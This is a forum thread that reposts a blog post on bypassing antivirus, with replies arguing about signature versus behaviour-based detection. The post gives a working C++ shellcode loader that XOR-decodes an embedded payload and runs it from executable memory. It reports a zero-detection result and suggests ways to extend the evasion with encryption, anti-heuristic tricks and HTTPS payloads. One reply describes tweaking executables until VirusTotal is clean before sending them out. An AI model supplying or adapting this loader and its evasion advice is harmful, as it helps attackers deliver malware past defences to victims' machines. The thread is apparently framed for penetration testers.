Bypassing Antivirus With Ten Lines of Code or (Yet Again) Why Antivirus is Largely Useless

[steven36]

I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my resultant binary to virustotal. To my complete and utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded idea and move forward with this quick, dirty, and unbelievably easy method.

 

I believe that most of my readers would agree with me that bypassing most antivirus based solutions is rather trivial, however I do occasionally bump in to some people who solely rely on tools that generate binaries that can easily be fingerprinted and flagged by antivirus solutions. This article is largely intended for that audience.

Before I dive in to this small tidbit of C++ code, I'd like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of the Veil-Framework). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances I have had to use it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. If you people could stop doing that, that would be great.

At any rate, this begs the question, if tools like Veil Evasion are so epic, why should you care about knowing how to slap togother a binary with a shellcode payload yourself? Well there are a number of reasons:
 

• People get busy and tools become deprecated
• The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary.
• As a penetration tester, you should really know how to do this. Ups your leet cred.. or so I hear.

 

Before you take a look at the below code, it's worth noting that this is targeting the windows platform; as obviously noted with the reference to windows.h ;)

 

#include <windows.h> #include <iostream> int main(int argc, char **argv) { char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)(); }

Quite simply, the above code creates a character array with shell code you can add, performs an XOR operation with the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the character array in said allocated memory, and executes it. It may be worth highlighting that you will need to XOR your shellcode with your key of choosing (in this case 'x') before you put it in the above code and compile.

So you are probably looking at that and thinking 'really?' - I know how you feel. This is how I felt after I intended this to be step 1 of my tutorial and I ran it through virustotal and it returned 0/56 detection. I'd like to stress that this is an incredible simple and most basic technique, yet its success is still rather astonishing.

I originally wrote this example and tested it on virus total a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate.

 

 

The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework.
 

Final Comments

Alright, so antivirus is dead. We all know that. That being said, we can't argue that over 95% of organizations are still depending on antivirus to protect endpoints. 

 

Is there a better way? certainly. A number of vendors, which I shall not name, have launched products that take a new approach to protecting endpoints primarily focusing on identification of known exploit techniques. This is usually performed by way of injecting DLLs in to processes that will monitor for these known techniques and prevent the exploit from working successfully. 

 

Is this fool proof technique? I would be inclined to say no. The bar will be raised, but a new type of cat and mouse game will begin.

Final note: The above may not work on _all_ antivirus solutions. I figure that was obvious, but thought I would mention it before the pitch forks come after me!

Wow. This post blew up a lot more than I intended it to. Please bear in mind that this article was targeted at penetration testers. The goal was to demonstrate an extremely simplistic signature based AV bypass technique. I didn't point out 'signature' as I assumed it was obvious that heuristics capabilities would very likely pick this up - although it really depends on your payload more than anything else. I don't advocate using this technique over infinitely more sophisticated implementations that can be found in Veil-Framework or Shellter. Think of the above code as a template - get creative - make the encoding routing more complicated - maybe implement encryption with key bruteforcing? then maybe add some prime number generation at the get go to throw off heuristics if you want to be fancy. Use payloads that communicate over HTTPS as well. Sky's the limit - this was just a super fundamental example.

 

The Source

 

[RejZoR]

People should know by now that traditional fingerprinting method is just a tiny fraction of protection capability by antiviruses. VirusTotal basically only uses this, that's why there is zero out of whatever value. All AV's today use cloud based systems, runtime heuristics and behavior analysis not employed on VirusTotal.

 

Make a test against antiviruses by actually executing the file and if it still bypasses so many of them, then I'll agree. But to be honest, I already know that wont' be the case. You can't fool behavior based detections with 10 lines of code. Maybe a very basic pattern match engine, but not behavior one.

[steven36]

17 minutes ago, RejZoR said:

People should know by now that traditional fingerprinting method is just a tiny fraction of protection capability by antiviruses. VirusTotal basically only uses this, that's why there is zero out of whatever value. All AV's today use cloud based systems, runtime heuristics and behavior analysis not employed on VirusTotal.

 

Make a test against antiviruses by actually executing the file and if it still bypasses so many of them, then I'll agree. But to be honest, I already know that wont' be the case. You can't fool behavior based detections with 10 lines of code. Maybe a very basic pattern match engine, but not behavior one.

It use to be really easy  if you got a false positive   with DUP  patchmaker to just use a certain file packer and remove the false positives  . Back in like 2008  I got a infected Keygen  that bypassed kapersky it only had 2 hits on VT so I dont think it would be imposable  to alter  the code . Kaspersky had saved me a 100 times before but all it takes is one skilled malware writer  to get around  most antivirus , DR. PC Puttie had something he used to  hide false positives  too,  but he was a good cracker . There's lots  things out there that be used to get around it if a Antivirus  dont have the signature . That' why its best to use a antivirus  that has Anti Exploit .

[RejZoR]

Nothing is 100% in this world. Antidotes don't work 100% of the time, vaccines don't either and neither do airbags and seatbelts or circuit breakers. There will ALWAYS be at least one situation when one of these will fail. It's just how it is. But if your chance of that happening to you is 10:1 or 10.000.000:1, that makes a huge difference.

[steven36]

13 minutes ago, RejZoR said:

Nothing is 100% in this world. Antidotes don't work 100% of the time, vaccines don't either and neither do airbags and seatbelts or circuit breakers. There will ALWAYS be at least one situation when one of these will fail. It's just how it is. But if your chance of that happening to you is 10:1 or 10.000.000:1, that makes a huge difference.

You remember MeGaHeRTZ ? I never used none of  there cracks but they put out Trojan laced patches in the scene  a long time unnoticed . All it takes is some bad actors  to infect millions  of people easy.

http://scenenotice.org/details.php?id=2190

 

The year they was around 2013 everything they done  was nuked reason:  contains.trojan they didn't catch on to it tell almost a year latter.

[CODYQX4]

Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.

[RejZoR]

10 minutes ago, CODYQX4 said:

Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.

 

With cloud systems and automated detection systems cloud side, things aren't as simple. You may bypass VT, but clouds are very unpredictable for malware writers. They can test offline and bypass it, but once cloud networks notice such files, they quickly get detected and become worthless. If they test online, that happens already during testing. They have quite a lot more work to do than before. And that's good.

[steven36]

33 minutes ago, CODYQX4 said:

Rejigger EXE until clean VirusTotal (or good enough), then send it out. I've uploaded malware from ransomware stricken PCs after the fact and most AV failed to see it for what it was.

 

Kaspersky detected it, FYI.

Yes there's most the time 1 or 2 that will detect  any malware but in some  cases Kapersky wont . So  unless you had all antivirus installed at once what good is it?  Even the OP says that much hes not saying not  none will detect it.  But i had Antivirus detect  legit programs false positives before and not show up on VT so protection can be very misleading to any noob,  I dont use a antivirus on Linux  but I still do on windows . But the last time i remember  any of them getting me out of a real jam was back in  the 1st decade of 21st century  . They just call out false positives.